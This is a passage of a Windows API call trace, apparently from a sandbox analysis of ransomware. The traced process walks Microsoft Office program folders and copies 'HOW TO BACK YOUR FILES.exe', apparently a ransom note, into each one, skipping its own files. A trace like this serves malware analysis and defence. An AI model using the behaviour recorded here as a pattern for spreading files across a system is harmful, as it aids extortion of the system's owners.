Office\\Office14\\Groove\\Sounds\\Places\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51b925d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c534f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c534f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.837] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.837] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.838] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People" [0071.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0071.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0071.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People") returned 63 [0071.838] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People" [0071.838] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.838] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.850] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.850] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52a72f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c534f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c534f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.850] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.850] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.850] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates" [0071.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0071.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0071.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates") returned 62 [0071.850] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates" [0071.850] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.850] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.854] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.854] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c55b080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c55b080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.854] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.854] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.855] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign" [0071.855] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cff70 | out: hHeap=0x2b0000) returned 1 [0071.855] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0071.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign") returned 71 [0071.855] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign" [0071.855] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.855] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.864] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.864] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e490770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c55b080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c55b080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.864] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.864] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.864] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components" [0071.864] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2ea0 | out: hHeap=0x2b0000) returned 1 [0071.864] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0071.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components") returned 82 [0071.864] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components" [0071.864] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.864] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.874] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.874] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e490770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c5811e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c5811e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.874] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.874] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.875] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net" [0071.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335108 | out: hHeap=0x2b0000) returned 1 [0071.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0071.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net") returned 73 [0071.875] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net" [0071.875] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.875] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.921] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.921] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c5f3600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c5f3600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.922] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.922] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.922] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers" [0071.922] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2ea0 | out: hHeap=0x2b0000) returned 1 [0071.922] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0071.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers") returned 81 [0071.922] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers" [0071.922] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.922] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\servers\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.926] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.926] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c5f3600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c5f3600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.926] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.926] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.927] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects" [0071.927] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0071.927] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0071.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects") returned 88 [0071.927] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects" [0071.927] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.927] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\managedobjects\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.931] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.931] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c619760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c619760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.931] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.931] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.931] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components" [0071.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1d98 | out: hHeap=0x2b0000) returned 1 [0071.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0071.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components") returned 84 [0071.931] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components" [0071.931] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.931] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\components\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.938] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.938] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d2c00d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c619760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c619760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.938] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.938] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.939] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\FORMS", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\FORMS") returned="C:\\Program Files\\Microsoft Office\\Office14\\FORMS" [0071.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4780 | out: hHeap=0x2b0000) returned 1 [0071.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0071.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS") returned 48 [0071.939] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\FORMS" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\FORMS") returned="C:\\Program Files\\Microsoft Office\\Office14\\FORMS" [0071.939] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.939] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.965] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.965] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccc730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c63f8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c63f8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.965] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.966] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.967] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033") returned="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033" [0071.967] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0071.967] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0071.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033") returned 53 [0071.967] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033") returned="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033" [0071.967] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.968] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.989] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.989] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccc730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c68bb80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c68bb80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.990] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.990] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.999] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts") returned="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts" [0071.999] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0071.999] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0071.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts") returned 57 [0071.999] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts") returned="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts" [0071.999] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.999] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\document parts\\how to back your files.exe"), bFailIfExists=1) returned 1 [0072.030] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.030] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e3382f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c6b1ce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c6b1ce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0072.031] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.031] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.031] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033", iMaxLength=260 | out: 